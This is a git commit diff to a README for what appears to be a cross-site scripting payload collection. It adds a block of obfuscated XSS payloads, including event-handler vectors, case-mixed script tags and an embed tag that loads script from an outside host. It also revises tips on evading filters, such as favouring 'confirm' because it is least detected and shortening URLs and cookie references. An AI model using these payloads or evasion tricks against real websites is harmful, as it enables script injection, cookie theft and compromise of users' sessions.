Update README.md
This commit is contained in:
parent
06901e913f
commit
f2875878b4
1 changed files with 11 additions and 4 deletions
15
README.md
15
README.md
|
@ -53,7 +53,15 @@ Put this repo on watch. I will be updating it regularly.
|
||||||
```
|
```
|
||||||
|
|
||||||
### Awesome Payloads
|
### Awesome Payloads
|
||||||
Come back later
|
```
|
||||||
|
<svg%0Aonload=%09((pro\u006dpt))()//
|
||||||
|
<sCript x>(((confirm)))``</scRipt x>
|
||||||
|
<svg/x=">"/onload=confirm()//
|
||||||
|
<embed src=//14.rs>
|
||||||
|
<x oncut=alert()>x
|
||||||
|
<details ontoggle=confirm()>
|
||||||
|
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
|
||||||
|
```
|
||||||
|
|
||||||
### Awesome Exploits
|
### Awesome Exploits
|
||||||
Come back later
|
Come back later
|
||||||
|
@ -114,14 +122,13 @@ If the your dummy tags lands in the source code as it is, go for any of these pa
|
||||||
Come back later
|
Come back later
|
||||||
|
|
||||||
### Awesome Tips & Tricks
|
### Awesome Tips & Tricks
|
||||||
- http:// can be shortened to //
|
- http(s):// can be shortened to // or /\.
|
||||||
- **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well.
|
- **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well.
|
||||||
- alert and other pop-up functions don't need a value, so stop doing **alert(1)** and start doing **alert()**
|
- alert and other pop-up functions don't need a value, so stop doing **alert(1)** and start doing **alert()**
|
||||||
- I have found that **confirm** is the least detected pop-up function so stop using **alert**.
|
- I have found that **confirm** is the least detected pop-up function so stop using **alert**.
|
||||||
- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"&glt;**
|
- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"&glt;**
|
||||||
- The shortest independent payload is **<embed src=//14.rs>** (19 chars)
|
- The shortest independent payload is **<embed src=//14.rs>** (19 chars)
|
||||||
|
|
||||||
## Credits and all that
|
### Awesome Credits
|
||||||
Help me buy a new laptop:
|
|
||||||
All the payloads are crafted by me unless specified.
|
All the payloads are crafted by me unless specified.
|
||||||
Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.
|
Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.
|
||||||
|
|
Loading…
Reference in a new issue